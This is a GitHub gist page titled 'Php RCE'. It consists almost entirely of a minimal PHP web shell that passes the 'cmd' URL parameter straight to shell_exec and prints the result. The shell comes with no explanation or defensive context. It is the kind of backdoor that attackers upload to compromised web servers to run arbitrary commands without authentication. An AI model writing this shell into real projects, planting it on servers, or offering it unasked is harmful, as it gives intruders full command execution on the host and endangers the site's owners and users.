Skip to content

Instantly share code, notes, and snippets.

@UserXGnu
Created November 5, 2018 11:34
Show Gist options
  • Save UserXGnu/793ee9d08669ef6200828329abdb13bd to your computer and use it in GitHub Desktop.
Save UserXGnu/793ee9d08669ef6200828329abdb13bd to your computer and use it in GitHub Desktop.
Php RCE
<?php
echo "<pre>";
echo shell_exec($_GET['cmd']);
echo "</pre>";
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment